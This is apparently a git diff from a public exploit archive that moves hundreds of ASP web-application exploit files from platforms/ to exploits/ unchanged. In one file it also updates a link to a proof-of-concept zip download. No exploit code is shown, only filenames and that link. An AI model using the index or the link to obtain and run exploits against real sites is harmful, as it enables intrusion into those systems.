platforms/asp/webapps/32833.txt rename to exploits/asp/webapps/32833.txt diff --git a/platforms/asp/webapps/32874.txt b/exploits/asp/webapps/32874.txt similarity index 100% rename from platforms/asp/webapps/32874.txt rename to exploits/asp/webapps/32874.txt diff --git a/platforms/asp/webapps/32882.txt b/exploits/asp/webapps/32882.txt similarity index 100% rename from platforms/asp/webapps/32882.txt rename to exploits/asp/webapps/32882.txt diff --git a/platforms/asp/webapps/32888.txt b/exploits/asp/webapps/32888.txt similarity index 100% rename from platforms/asp/webapps/32888.txt rename to exploits/asp/webapps/32888.txt diff --git a/platforms/asp/webapps/32898.txt b/exploits/asp/webapps/32898.txt similarity index 100% rename from platforms/asp/webapps/32898.txt rename to exploits/asp/webapps/32898.txt diff --git a/platforms/asp/webapps/32903.txt b/exploits/asp/webapps/32903.txt similarity index 100% rename from platforms/asp/webapps/32903.txt rename to exploits/asp/webapps/32903.txt diff --git a/platforms/asp/webapps/3295.txt b/exploits/asp/webapps/3295.txt similarity index 100% rename from platforms/asp/webapps/3295.txt rename to exploits/asp/webapps/3295.txt diff --git a/platforms/asp/webapps/32953.vbs b/exploits/asp/webapps/32953.vbs similarity index 100% rename from platforms/asp/webapps/32953.vbs rename to exploits/asp/webapps/32953.vbs diff --git a/platforms/asp/webapps/33009.txt b/exploits/asp/webapps/33009.txt similarity index 100% rename from platforms/asp/webapps/33009.txt rename to exploits/asp/webapps/33009.txt diff --git a/platforms/asp/webapps/3301.txt b/exploits/asp/webapps/3301.txt similarity index 100% rename from platforms/asp/webapps/3301.txt rename to exploits/asp/webapps/3301.txt diff --git a/platforms/asp/webapps/3317.txt b/exploits/asp/webapps/3317.txt similarity index 100% rename from platforms/asp/webapps/3317.txt rename to exploits/asp/webapps/3317.txt diff --git a/platforms/asp/webapps/33171.txt b/exploits/asp/webapps/33171.txt similarity index 100% rename from platforms/asp/webapps/33171.txt rename to exploits/asp/webapps/33171.txt diff --git a/platforms/asp/webapps/3318.txt b/exploits/asp/webapps/3318.txt similarity index 100% rename from platforms/asp/webapps/3318.txt rename to exploits/asp/webapps/3318.txt diff --git a/platforms/asp/webapps/3321.txt b/exploits/asp/webapps/3321.txt similarity index 100% rename from platforms/asp/webapps/3321.txt rename to exploits/asp/webapps/3321.txt diff --git a/platforms/asp/webapps/33236.txt b/exploits/asp/webapps/33236.txt similarity index 100% rename from platforms/asp/webapps/33236.txt rename to exploits/asp/webapps/33236.txt diff --git a/platforms/asp/webapps/33268.html b/exploits/asp/webapps/33268.html similarity index 100% rename from platforms/asp/webapps/33268.html rename to exploits/asp/webapps/33268.html diff --git a/platforms/asp/webapps/33361.txt b/exploits/asp/webapps/33361.txt similarity index 100% rename from platforms/asp/webapps/33361.txt rename to exploits/asp/webapps/33361.txt diff --git a/platforms/asp/webapps/3339.txt b/exploits/asp/webapps/3339.txt similarity index 100% rename from platforms/asp/webapps/3339.txt rename to exploits/asp/webapps/3339.txt diff --git a/platforms/asp/webapps/33647.txt b/exploits/asp/webapps/33647.txt similarity index 100% rename from platforms/asp/webapps/33647.txt rename to exploits/asp/webapps/33647.txt diff --git a/platforms/asp/webapps/33700.txt b/exploits/asp/webapps/33700.txt similarity index 100% rename from platforms/asp/webapps/33700.txt rename to exploits/asp/webapps/33700.txt diff --git a/platforms/asp/webapps/33704.txt b/exploits/asp/webapps/33704.txt similarity index 100% rename from platforms/asp/webapps/33704.txt rename to exploits/asp/webapps/33704.txt diff --git a/platforms/asp/webapps/33715.txt b/exploits/asp/webapps/33715.txt similarity index 100% rename from platforms/asp/webapps/33715.txt rename to exploits/asp/webapps/33715.txt diff --git a/platforms/asp/webapps/33720.txt b/exploits/asp/webapps/33720.txt similarity index 100% rename from platforms/asp/webapps/33720.txt rename to exploits/asp/webapps/33720.txt diff --git a/platforms/asp/webapps/33721.txt b/exploits/asp/webapps/33721.txt similarity index 100% rename from platforms/asp/webapps/33721.txt rename to exploits/asp/webapps/33721.txt diff --git a/platforms/asp/webapps/33722.txt b/exploits/asp/webapps/33722.txt similarity index 100% rename from platforms/asp/webapps/33722.txt rename to exploits/asp/webapps/33722.txt diff --git a/platforms/asp/webapps/33728.txt b/exploits/asp/webapps/33728.txt similarity index 100% rename from platforms/asp/webapps/33728.txt rename to exploits/asp/webapps/33728.txt diff --git a/platforms/asp/webapps/33730.txt b/exploits/asp/webapps/33730.txt similarity index 100% rename from platforms/asp/webapps/33730.txt rename to exploits/asp/webapps/33730.txt diff --git a/platforms/asp/webapps/33758.txt b/exploits/asp/webapps/33758.txt similarity index 100% rename from platforms/asp/webapps/33758.txt rename to exploits/asp/webapps/33758.txt diff --git a/platforms/asp/webapps/33761.txt b/exploits/asp/webapps/33761.txt similarity index 100% rename from platforms/asp/webapps/33761.txt rename to exploits/asp/webapps/33761.txt diff --git a/platforms/asp/webapps/33825.txt b/exploits/asp/webapps/33825.txt similarity index 100% rename from platforms/asp/webapps/33825.txt rename to exploits/asp/webapps/33825.txt diff --git a/platforms/asp/webapps/33840.txt b/exploits/asp/webapps/33840.txt similarity index 100% rename from platforms/asp/webapps/33840.txt rename to exploits/asp/webapps/33840.txt diff --git a/platforms/asp/webapps/3390.txt b/exploits/asp/webapps/3390.txt similarity index 100% rename from platforms/asp/webapps/3390.txt rename to exploits/asp/webapps/3390.txt diff --git a/platforms/asp/webapps/33923.txt b/exploits/asp/webapps/33923.txt similarity index 100% rename from platforms/asp/webapps/33923.txt rename to exploits/asp/webapps/33923.txt diff --git a/platforms/asp/webapps/33959.txt b/exploits/asp/webapps/33959.txt similarity index 100% rename from platforms/asp/webapps/33959.txt rename to exploits/asp/webapps/33959.txt diff --git a/platforms/asp/webapps/33992.txt b/exploits/asp/webapps/33992.txt similarity index 100% rename from platforms/asp/webapps/33992.txt rename to exploits/asp/webapps/33992.txt diff --git a/platforms/asp/webapps/34034.txt b/exploits/asp/webapps/34034.txt similarity index 100% rename from platforms/asp/webapps/34034.txt rename to exploits/asp/webapps/34034.txt diff --git a/platforms/asp/webapps/34180.txt b/exploits/asp/webapps/34180.txt similarity index 100% rename from platforms/asp/webapps/34180.txt rename to exploits/asp/webapps/34180.txt diff --git a/platforms/asp/webapps/34194.txt b/exploits/asp/webapps/34194.txt similarity index 100% rename from platforms/asp/webapps/34194.txt rename to exploits/asp/webapps/34194.txt diff --git a/platforms/asp/webapps/34221.txt b/exploits/asp/webapps/34221.txt similarity index 100% rename from platforms/asp/webapps/34221.txt rename to exploits/asp/webapps/34221.txt diff --git a/platforms/asp/webapps/34343.txt b/exploits/asp/webapps/34343.txt similarity index 100% rename from platforms/asp/webapps/34343.txt rename to exploits/asp/webapps/34343.txt diff --git a/platforms/asp/webapps/34344.txt b/exploits/asp/webapps/34344.txt similarity index 100% rename from platforms/asp/webapps/34344.txt rename to exploits/asp/webapps/34344.txt diff --git a/platforms/asp/webapps/3437.txt b/exploits/asp/webapps/3437.txt similarity index 100% rename from platforms/asp/webapps/3437.txt rename to exploits/asp/webapps/3437.txt diff --git a/platforms/asp/webapps/34376.txt b/exploits/asp/webapps/34376.txt similarity index 100% rename from platforms/asp/webapps/34376.txt rename to exploits/asp/webapps/34376.txt diff --git a/platforms/asp/webapps/34380.txt b/exploits/asp/webapps/34380.txt similarity index 100% rename from platforms/asp/webapps/34380.txt rename to exploits/asp/webapps/34380.txt diff --git a/platforms/asp/webapps/34397.txt b/exploits/asp/webapps/34397.txt similarity index 100% rename from platforms/asp/webapps/34397.txt rename to exploits/asp/webapps/34397.txt diff --git a/platforms/asp/webapps/34411.txt b/exploits/asp/webapps/34411.txt similarity index 100% rename from platforms/asp/webapps/34411.txt rename to exploits/asp/webapps/34411.txt diff --git a/platforms/asp/webapps/34429.txt b/exploits/asp/webapps/34429.txt similarity index 100% rename from platforms/asp/webapps/34429.txt rename to exploits/asp/webapps/34429.txt diff --git a/platforms/asp/webapps/34492.txt b/exploits/asp/webapps/34492.txt similarity index 100% rename from platforms/asp/webapps/34492.txt rename to exploits/asp/webapps/34492.txt diff --git a/platforms/asp/webapps/34614.txt b/exploits/asp/webapps/34614.txt similarity index 100% rename from platforms/asp/webapps/34614.txt rename to exploits/asp/webapps/34614.txt diff --git a/platforms/asp/webapps/3466.txt b/exploits/asp/webapps/3466.txt similarity index 100% rename from platforms/asp/webapps/3466.txt rename to exploits/asp/webapps/3466.txt diff --git a/platforms/asp/webapps/34687.txt b/exploits/asp/webapps/34687.txt similarity index 100% rename from platforms/asp/webapps/34687.txt rename to exploits/asp/webapps/34687.txt diff --git a/platforms/asp/webapps/3469.txt b/exploits/asp/webapps/3469.txt similarity index 100% rename from platforms/asp/webapps/3469.txt rename to exploits/asp/webapps/3469.txt diff --git a/platforms/asp/webapps/3470.html b/exploits/asp/webapps/3470.html similarity index 100% rename from platforms/asp/webapps/3470.html rename to exploits/asp/webapps/3470.html diff --git a/platforms/asp/webapps/34753.py b/exploits/asp/webapps/34753.py similarity index 100% rename from platforms/asp/webapps/34753.py rename to exploits/asp/webapps/34753.py diff --git a/platforms/asp/webapps/3481.html b/exploits/asp/webapps/3481.html similarity index 100% rename from platforms/asp/webapps/3481.html rename to exploits/asp/webapps/3481.html diff --git a/platforms/asp/webapps/34864.txt b/exploits/asp/webapps/34864.txt similarity index 100% rename from platforms/asp/webapps/34864.txt rename to exploits/asp/webapps/34864.txt diff --git a/platforms/asp/webapps/34920.txt b/exploits/asp/webapps/34920.txt similarity index 100% rename from platforms/asp/webapps/34920.txt rename to exploits/asp/webapps/34920.txt diff --git a/platforms/asp/webapps/3493.txt b/exploits/asp/webapps/3493.txt similarity index 100% rename from platforms/asp/webapps/3493.txt rename to exploits/asp/webapps/3493.txt diff --git a/platforms/asp/webapps/34936.txt b/exploits/asp/webapps/34936.txt similarity index 100% rename from platforms/asp/webapps/34936.txt rename to exploits/asp/webapps/34936.txt diff --git a/platforms/asp/webapps/34948.txt b/exploits/asp/webapps/34948.txt similarity index 100% rename from platforms/asp/webapps/34948.txt rename to exploits/asp/webapps/34948.txt diff --git a/platforms/asp/webapps/34971.txt b/exploits/asp/webapps/34971.txt similarity index 100% rename from platforms/asp/webapps/34971.txt rename to exploits/asp/webapps/34971.txt diff --git a/platforms/asp/webapps/35031.txt b/exploits/asp/webapps/35031.txt similarity index 100% rename from platforms/asp/webapps/35031.txt rename to exploits/asp/webapps/35031.txt diff --git a/platforms/asp/webapps/35045.txt b/exploits/asp/webapps/35045.txt similarity index 100% rename from platforms/asp/webapps/35045.txt rename to exploits/asp/webapps/35045.txt diff --git a/platforms/asp/webapps/35048.txt b/exploits/asp/webapps/35048.txt similarity index 100% rename from platforms/asp/webapps/35048.txt rename to exploits/asp/webapps/35048.txt diff --git a/platforms/asp/webapps/35049.txt b/exploits/asp/webapps/35049.txt similarity index 100% rename from platforms/asp/webapps/35049.txt rename to exploits/asp/webapps/35049.txt diff --git a/platforms/asp/webapps/35065.txt b/exploits/asp/webapps/35065.txt similarity index 100% rename from platforms/asp/webapps/35065.txt rename to exploits/asp/webapps/35065.txt diff --git a/platforms/asp/webapps/35168.txt b/exploits/asp/webapps/35168.txt similarity index 100% rename from platforms/asp/webapps/35168.txt rename to exploits/asp/webapps/35168.txt diff --git a/platforms/asp/webapps/3520.txt b/exploits/asp/webapps/3520.txt similarity index 100% rename from platforms/asp/webapps/3520.txt rename to exploits/asp/webapps/3520.txt diff --git a/platforms/asp/webapps/35310.txt b/exploits/asp/webapps/35310.txt similarity index 100% rename from platforms/asp/webapps/35310.txt rename to exploits/asp/webapps/35310.txt diff --git a/platforms/asp/webapps/3534.txt b/exploits/asp/webapps/3534.txt similarity index 100% rename from platforms/asp/webapps/3534.txt rename to exploits/asp/webapps/3534.txt diff --git a/platforms/asp/webapps/3536.txt b/exploits/asp/webapps/3536.txt similarity index 100% rename from platforms/asp/webapps/3536.txt rename to exploits/asp/webapps/3536.txt diff --git a/platforms/asp/webapps/35411.txt b/exploits/asp/webapps/35411.txt similarity index 100% rename from platforms/asp/webapps/35411.txt rename to exploits/asp/webapps/35411.txt diff --git a/platforms/asp/webapps/35412.txt b/exploits/asp/webapps/35412.txt similarity index 100% rename from platforms/asp/webapps/35412.txt rename to exploits/asp/webapps/35412.txt diff --git a/platforms/asp/webapps/3546.txt b/exploits/asp/webapps/3546.txt similarity index 100% rename from platforms/asp/webapps/3546.txt rename to exploits/asp/webapps/3546.txt diff --git a/platforms/asp/webapps/3549.txt b/exploits/asp/webapps/3549.txt similarity index 100% rename from platforms/asp/webapps/3549.txt rename to exploits/asp/webapps/3549.txt diff --git a/platforms/asp/webapps/3550.txt b/exploits/asp/webapps/3550.txt similarity index 100% rename from platforms/asp/webapps/3550.txt rename to exploits/asp/webapps/3550.txt diff --git a/platforms/asp/webapps/3551.txt b/exploits/asp/webapps/3551.txt similarity index 100% rename from platforms/asp/webapps/3551.txt rename to exploits/asp/webapps/3551.txt diff --git a/platforms/asp/webapps/3556.html b/exploits/asp/webapps/3556.html similarity index 100% rename from platforms/asp/webapps/3556.html rename to exploits/asp/webapps/3556.html diff --git a/platforms/asp/webapps/35576.txt b/exploits/asp/webapps/35576.txt similarity index 100% rename from platforms/asp/webapps/35576.txt rename to exploits/asp/webapps/35576.txt diff --git a/platforms/asp/webapps/3558.html b/exploits/asp/webapps/3558.html similarity index 100% rename from platforms/asp/webapps/3558.html rename to exploits/asp/webapps/3558.html diff --git a/platforms/asp/webapps/35599.txt b/exploits/asp/webapps/35599.txt similarity index 100% rename from platforms/asp/webapps/35599.txt rename to exploits/asp/webapps/35599.txt diff --git a/platforms/asp/webapps/35728.txt b/exploits/asp/webapps/35728.txt similarity index 100% rename from platforms/asp/webapps/35728.txt rename to exploits/asp/webapps/35728.txt diff --git a/platforms/asp/webapps/35758.txt b/exploits/asp/webapps/35758.txt similarity index 100% rename from platforms/asp/webapps/35758.txt rename to exploits/asp/webapps/35758.txt diff --git a/platforms/asp/webapps/35807.txt b/exploits/asp/webapps/35807.txt similarity index 100% rename from platforms/asp/webapps/35807.txt rename to exploits/asp/webapps/35807.txt diff --git a/platforms/asp/webapps/35852.txt b/exploits/asp/webapps/35852.txt similarity index 100% rename from platforms/asp/webapps/35852.txt rename to exploits/asp/webapps/35852.txt diff --git a/platforms/asp/webapps/35872.txt b/exploits/asp/webapps/35872.txt similarity index 100% rename from platforms/asp/webapps/35872.txt rename to exploits/asp/webapps/35872.txt diff --git a/platforms/asp/webapps/35923.txt b/exploits/asp/webapps/35923.txt similarity index 100% rename from platforms/asp/webapps/35923.txt rename to exploits/asp/webapps/35923.txt diff --git a/platforms/asp/webapps/35926.txt b/exploits/asp/webapps/35926.txt similarity index 100% rename from platforms/asp/webapps/35926.txt rename to exploits/asp/webapps/35926.txt diff --git a/platforms/asp/webapps/36001.txt b/exploits/asp/webapps/36001.txt similarity index 100% rename from platforms/asp/webapps/36001.txt rename to exploits/asp/webapps/36001.txt diff --git a/platforms/asp/webapps/36010.txt b/exploits/asp/webapps/36010.txt similarity index 100% rename from platforms/asp/webapps/36010.txt rename to exploits/asp/webapps/36010.txt diff --git a/platforms/asp/webapps/36011.txt b/exploits/asp/webapps/36011.txt similarity index 100% rename from platforms/asp/webapps/36011.txt rename to exploits/asp/webapps/36011.txt diff --git a/platforms/asp/webapps/36019.txt b/exploits/asp/webapps/36019.txt similarity index 100% rename from platforms/asp/webapps/36019.txt rename to exploits/asp/webapps/36019.txt diff --git a/platforms/asp/webapps/36063.txt b/exploits/asp/webapps/36063.txt similarity index 100% rename from platforms/asp/webapps/36063.txt rename to exploits/asp/webapps/36063.txt diff --git a/platforms/asp/webapps/36064.txt b/exploits/asp/webapps/36064.txt similarity index 100% rename from platforms/asp/webapps/36064.txt rename to exploits/asp/webapps/36064.txt diff --git a/platforms/asp/webapps/36065.txt b/exploits/asp/webapps/36065.txt similarity index 100% rename from platforms/asp/webapps/36065.txt rename to exploits/asp/webapps/36065.txt diff --git a/platforms/asp/webapps/36066.txt b/exploits/asp/webapps/36066.txt similarity index 100% rename from platforms/asp/webapps/36066.txt rename to exploits/asp/webapps/36066.txt diff --git a/platforms/asp/webapps/36116.txt b/exploits/asp/webapps/36116.txt similarity index 100% rename from platforms/asp/webapps/36116.txt rename to exploits/asp/webapps/36116.txt diff --git a/platforms/asp/webapps/36133.txt b/exploits/asp/webapps/36133.txt similarity index 100% rename from platforms/asp/webapps/36133.txt rename to exploits/asp/webapps/36133.txt diff --git a/platforms/asp/webapps/36134.txt b/exploits/asp/webapps/36134.txt similarity index 100% rename from platforms/asp/webapps/36134.txt rename to exploits/asp/webapps/36134.txt diff --git a/platforms/asp/webapps/36138.txt b/exploits/asp/webapps/36138.txt similarity index 100% rename from platforms/asp/webapps/36138.txt rename to exploits/asp/webapps/36138.txt diff --git a/platforms/asp/webapps/36139.txt b/exploits/asp/webapps/36139.txt similarity index 100% rename from platforms/asp/webapps/36139.txt rename to exploits/asp/webapps/36139.txt diff --git a/platforms/asp/webapps/36141.txt b/exploits/asp/webapps/36141.txt similarity index 100% rename from platforms/asp/webapps/36141.txt rename to exploits/asp/webapps/36141.txt diff --git a/platforms/asp/webapps/36146.txt b/exploits/asp/webapps/36146.txt similarity index 100% rename from platforms/asp/webapps/36146.txt rename to exploits/asp/webapps/36146.txt diff --git a/platforms/asp/webapps/36284.txt b/exploits/asp/webapps/36284.txt similarity index 100% rename from platforms/asp/webapps/36284.txt rename to exploits/asp/webapps/36284.txt diff --git a/platforms/asp/webapps/36375.txt b/exploits/asp/webapps/36375.txt similarity index 100% rename from platforms/asp/webapps/36375.txt rename to exploits/asp/webapps/36375.txt diff --git a/platforms/asp/webapps/36402.txt b/exploits/asp/webapps/36402.txt similarity index 100% rename from platforms/asp/webapps/36402.txt rename to exploits/asp/webapps/36402.txt diff --git a/platforms/asp/webapps/36515.txt b/exploits/asp/webapps/36515.txt similarity index 100% rename from platforms/asp/webapps/36515.txt rename to exploits/asp/webapps/36515.txt diff --git a/platforms/asp/webapps/36547.txt b/exploits/asp/webapps/36547.txt similarity index 100% rename from platforms/asp/webapps/36547.txt rename to exploits/asp/webapps/36547.txt diff --git a/platforms/asp/webapps/36585.txt b/exploits/asp/webapps/36585.txt similarity index 100% rename from platforms/asp/webapps/36585.txt rename to exploits/asp/webapps/36585.txt diff --git a/platforms/asp/webapps/36588.txt b/exploits/asp/webapps/36588.txt similarity index 100% rename from platforms/asp/webapps/36588.txt rename to exploits/asp/webapps/36588.txt diff --git a/platforms/asp/webapps/36599.txt b/exploits/asp/webapps/36599.txt similarity index 100% rename from platforms/asp/webapps/36599.txt rename to exploits/asp/webapps/36599.txt diff --git a/platforms/asp/webapps/36934.txt b/exploits/asp/webapps/36934.txt similarity index 100% rename from platforms/asp/webapps/36934.txt rename to exploits/asp/webapps/36934.txt diff --git a/platforms/asp/webapps/36935.txt b/exploits/asp/webapps/36935.txt similarity index 100% rename from platforms/asp/webapps/36935.txt rename to exploits/asp/webapps/36935.txt diff --git a/platforms/asp/webapps/36936.txt b/exploits/asp/webapps/36936.txt similarity index 100% rename from platforms/asp/webapps/36936.txt rename to exploits/asp/webapps/36936.txt diff --git a/platforms/asp/webapps/37015.txt b/exploits/asp/webapps/37015.txt similarity index 100% rename from platforms/asp/webapps/37015.txt rename to exploits/asp/webapps/37015.txt diff --git a/platforms/asp/webapps/37119.txt b/exploits/asp/webapps/37119.txt similarity index 100% rename from platforms/asp/webapps/37119.txt rename to exploits/asp/webapps/37119.txt diff --git a/platforms/asp/webapps/37121.txt b/exploits/asp/webapps/37121.txt similarity index 100% rename from platforms/asp/webapps/37121.txt rename to exploits/asp/webapps/37121.txt diff --git a/platforms/asp/webapps/37222.txt b/exploits/asp/webapps/37222.txt similarity index 100% rename from platforms/asp/webapps/37222.txt rename to exploits/asp/webapps/37222.txt diff --git a/platforms/asp/webapps/37223.txt b/exploits/asp/webapps/37223.txt similarity index 100% rename from platforms/asp/webapps/37223.txt rename to exploits/asp/webapps/37223.txt diff --git a/platforms/asp/webapps/37447.txt b/exploits/asp/webapps/37447.txt similarity index 100% rename from platforms/asp/webapps/37447.txt rename to exploits/asp/webapps/37447.txt diff --git a/platforms/asp/webapps/37488.txt b/exploits/asp/webapps/37488.txt similarity index 100% rename from platforms/asp/webapps/37488.txt rename to exploits/asp/webapps/37488.txt diff --git a/platforms/asp/webapps/37533.txt b/exploits/asp/webapps/37533.txt similarity index 100% rename from platforms/asp/webapps/37533.txt rename to exploits/asp/webapps/37533.txt diff --git a/platforms/asp/webapps/37577.txt b/exploits/asp/webapps/37577.txt similarity index 100% rename from platforms/asp/webapps/37577.txt rename to exploits/asp/webapps/37577.txt diff --git a/platforms/asp/webapps/3767.txt b/exploits/asp/webapps/3767.txt similarity index 100% rename from platforms/asp/webapps/3767.txt rename to exploits/asp/webapps/3767.txt diff --git a/platforms/asp/webapps/37676.txt b/exploits/asp/webapps/37676.txt similarity index 100% rename from platforms/asp/webapps/37676.txt rename to exploits/asp/webapps/37676.txt diff --git a/platforms/asp/webapps/37678.txt b/exploits/asp/webapps/37678.txt similarity index 100% rename from platforms/asp/webapps/37678.txt rename to exploits/asp/webapps/37678.txt diff --git a/platforms/asp/webapps/37689.txt b/exploits/asp/webapps/37689.txt similarity index 100% rename from platforms/asp/webapps/37689.txt rename to exploits/asp/webapps/37689.txt diff --git a/platforms/asp/webapps/37696.txt b/exploits/asp/webapps/37696.txt similarity index 100% rename from platforms/asp/webapps/37696.txt rename to exploits/asp/webapps/37696.txt diff --git a/platforms/asp/webapps/37892.txt b/exploits/asp/webapps/37892.txt similarity index 100% rename from platforms/asp/webapps/37892.txt rename to exploits/asp/webapps/37892.txt diff --git a/platforms/asp/webapps/37995.txt b/exploits/asp/webapps/37995.txt similarity index 100% rename from platforms/asp/webapps/37995.txt rename to exploits/asp/webapps/37995.txt diff --git a/platforms/asp/webapps/3831.txt b/exploits/asp/webapps/3831.txt similarity index 100% rename from platforms/asp/webapps/3831.txt rename to exploits/asp/webapps/3831.txt diff --git a/platforms/asp/webapps/38318.txt b/exploits/asp/webapps/38318.txt similarity index 100% rename from platforms/asp/webapps/38318.txt rename to exploits/asp/webapps/38318.txt diff --git a/platforms/asp/webapps/38351.txt b/exploits/asp/webapps/38351.txt similarity index 100% rename from platforms/asp/webapps/38351.txt rename to exploits/asp/webapps/38351.txt diff --git a/platforms/asp/webapps/38415.txt b/exploits/asp/webapps/38415.txt similarity index 100% rename from platforms/asp/webapps/38415.txt rename to exploits/asp/webapps/38415.txt diff --git a/platforms/asp/webapps/38479.txt b/exploits/asp/webapps/38479.txt similarity index 100% rename from platforms/asp/webapps/38479.txt rename to exploits/asp/webapps/38479.txt diff --git a/platforms/asp/webapps/38653.txt b/exploits/asp/webapps/38653.txt similarity index 100% rename from platforms/asp/webapps/38653.txt rename to exploits/asp/webapps/38653.txt diff --git a/platforms/asp/webapps/38655.txt b/exploits/asp/webapps/38655.txt similarity index 100% rename from platforms/asp/webapps/38655.txt rename to exploits/asp/webapps/38655.txt diff --git a/platforms/asp/webapps/38696.txt b/exploits/asp/webapps/38696.txt similarity index 100% rename from platforms/asp/webapps/38696.txt rename to exploits/asp/webapps/38696.txt diff --git a/platforms/asp/webapps/38749.txt b/exploits/asp/webapps/38749.txt similarity index 100% rename from platforms/asp/webapps/38749.txt rename to exploits/asp/webapps/38749.txt diff --git a/platforms/asp/webapps/38879.txt b/exploits/asp/webapps/38879.txt similarity index 100% rename from platforms/asp/webapps/38879.txt rename to exploits/asp/webapps/38879.txt diff --git a/platforms/asp/webapps/38883.txt b/exploits/asp/webapps/38883.txt similarity index 100% rename from platforms/asp/webapps/38883.txt rename to exploits/asp/webapps/38883.txt diff --git a/platforms/asp/webapps/38884.txt b/exploits/asp/webapps/38884.txt similarity index 100% rename from platforms/asp/webapps/38884.txt rename to exploits/asp/webapps/38884.txt diff --git a/platforms/asp/webapps/38935.txt b/exploits/asp/webapps/38935.txt similarity index 100% rename from platforms/asp/webapps/38935.txt rename to exploits/asp/webapps/38935.txt diff --git a/platforms/asp/webapps/3905.txt b/exploits/asp/webapps/3905.txt similarity index 100% rename from platforms/asp/webapps/3905.txt rename to exploits/asp/webapps/3905.txt diff --git a/platforms/asp/webapps/39106.txt b/exploits/asp/webapps/39106.txt similarity index 100% rename from platforms/asp/webapps/39106.txt rename to exploits/asp/webapps/39106.txt diff --git a/platforms/asp/webapps/3914.txt b/exploits/asp/webapps/3914.txt similarity index 100% rename from platforms/asp/webapps/3914.txt rename to exploits/asp/webapps/3914.txt diff --git a/platforms/asp/webapps/39187.txt b/exploits/asp/webapps/39187.txt similarity index 100% rename from platforms/asp/webapps/39187.txt rename to exploits/asp/webapps/39187.txt diff --git a/platforms/asp/webapps/39231.py b/exploits/asp/webapps/39231.py similarity index 100% rename from platforms/asp/webapps/39231.py rename to exploits/asp/webapps/39231.py diff --git a/platforms/asp/webapps/3936.txt b/exploits/asp/webapps/3936.txt similarity index 100% rename from platforms/asp/webapps/3936.txt rename to exploits/asp/webapps/3936.txt diff --git a/platforms/asp/webapps/39485.txt b/exploits/asp/webapps/39485.txt similarity index 100% rename from platforms/asp/webapps/39485.txt rename to exploits/asp/webapps/39485.txt diff --git a/platforms/asp/webapps/39777.txt b/exploits/asp/webapps/39777.txt similarity index 100% rename from platforms/asp/webapps/39777.txt rename to exploits/asp/webapps/39777.txt diff --git a/platforms/asp/webapps/39850.txt b/exploits/asp/webapps/39850.txt similarity index 100% rename from platforms/asp/webapps/39850.txt rename to exploits/asp/webapps/39850.txt diff --git a/platforms/asp/webapps/39897.txt b/exploits/asp/webapps/39897.txt similarity index 100% rename from platforms/asp/webapps/39897.txt rename to exploits/asp/webapps/39897.txt diff --git a/platforms/asp/webapps/39904.txt b/exploits/asp/webapps/39904.txt similarity index 100% rename from platforms/asp/webapps/39904.txt rename to exploits/asp/webapps/39904.txt diff --git a/platforms/asp/webapps/4007.txt b/exploits/asp/webapps/4007.txt similarity index 100% rename from platforms/asp/webapps/4007.txt rename to exploits/asp/webapps/4007.txt diff --git a/platforms/asp/webapps/40383.txt b/exploits/asp/webapps/40383.txt similarity index 100% rename from platforms/asp/webapps/40383.txt rename to exploits/asp/webapps/40383.txt diff --git a/platforms/asp/webapps/4040.txt b/exploits/asp/webapps/4040.txt similarity index 100% rename from platforms/asp/webapps/4040.txt rename to exploits/asp/webapps/4040.txt diff --git a/platforms/asp/webapps/4057.txt b/exploits/asp/webapps/4057.txt similarity index 100% rename from platforms/asp/webapps/4057.txt rename to exploits/asp/webapps/4057.txt diff --git a/platforms/asp/webapps/4083.txt b/exploits/asp/webapps/4083.txt similarity index 100% rename from platforms/asp/webapps/4083.txt rename to exploits/asp/webapps/4083.txt diff --git a/platforms/asp/webapps/4198.txt b/exploits/asp/webapps/4198.txt similarity index 100% rename from platforms/asp/webapps/4198.txt rename to exploits/asp/webapps/4198.txt diff --git a/platforms/asp/webapps/42127.txt b/exploits/asp/webapps/42127.txt similarity index 100% rename from platforms/asp/webapps/42127.txt rename to exploits/asp/webapps/42127.txt diff --git a/platforms/asp/webapps/4239.txt b/exploits/asp/webapps/4239.txt similarity index 100% rename from platforms/asp/webapps/4239.txt rename to exploits/asp/webapps/4239.txt diff --git a/platforms/asp/webapps/42690.txt b/exploits/asp/webapps/42690.txt similarity index 100% rename from platforms/asp/webapps/42690.txt rename to exploits/asp/webapps/42690.txt diff --git a/platforms/asp/webapps/42736.py b/exploits/asp/webapps/42736.py similarity index 100% rename from platforms/asp/webapps/42736.py rename to exploits/asp/webapps/42736.py diff --git a/platforms/asp/webapps/42737.py b/exploits/asp/webapps/42737.py similarity index 100% rename from platforms/asp/webapps/42737.py rename to exploits/asp/webapps/42737.py diff --git a/platforms/asp/webapps/42738.py b/exploits/asp/webapps/42738.py similarity index 100% rename from platforms/asp/webapps/42738.py rename to exploits/asp/webapps/42738.py diff --git a/platforms/asp/webapps/42776.txt b/exploits/asp/webapps/42776.txt similarity index 90% rename from platforms/asp/webapps/42776.txt rename to exploits/asp/webapps/42776.txt index a1fd26535..03b49c6ec 100644 --- a/platforms/asp/webapps/42776.txt +++ b/exploits/asp/webapps/42776.txt @@ -10,4 +10,4 @@ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42776.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42776.zip \ No newline at end of file diff --git a/platforms/asp/webapps/42792.txt b/exploits/asp/webapps/42792.txt similarity index 100% rename from platforms/asp/webapps/42792.txt rename to exploits/asp/webapps/42792.txt diff --git a/platforms/asp/webapps/4458.txt b/exploits/asp/webapps/4458.txt similarity index 100% rename from platforms/asp/webapps/4458.txt rename to exploits/asp/webapps/4458.txt diff --git a/platforms/asp/webapps/4486.txt b/exploits/asp/webapps/4486.txt similarity index 100% rename from platforms/asp/webapps/4486.txt rename to exploits/asp/webapps/4486.txt diff --git a/platforms/asp/webapps/4578.txt b/exploits/asp/webapps/4578.txt similarity index 100% rename from platforms/asp/webapps/4578.txt rename to exploits/asp/webapps/4578.txt diff --git a/platforms/asp/webapps/4609.txt b/exploits/asp/webapps/4609.txt similarity index 100% rename from platforms/asp/webapps/4609.txt rename to exploits/asp/webapps/4609.txt diff --git a/platforms/asp/webapps/4644.txt b/exploits/asp/webapps/4644.txt similarity index 100% rename from platforms/asp/webapps/4644.txt rename to exploits/asp/webapps/4644.txt diff --git a/platforms/asp/webapps/4687.html b/exploits/asp/webapps/4687.html similarity index 100% rename from platforms/asp/webapps/4687.html rename to exploits/asp/webapps/4687.html diff --git a/platforms/asp/webapps/4697.txt b/exploits/asp/webapps/4697.txt similarity index 100% rename from platforms/asp/webapps/4697.txt rename to exploits/asp/webapps/4697.txt diff --git a/platforms/asp/webapps/4730.txt 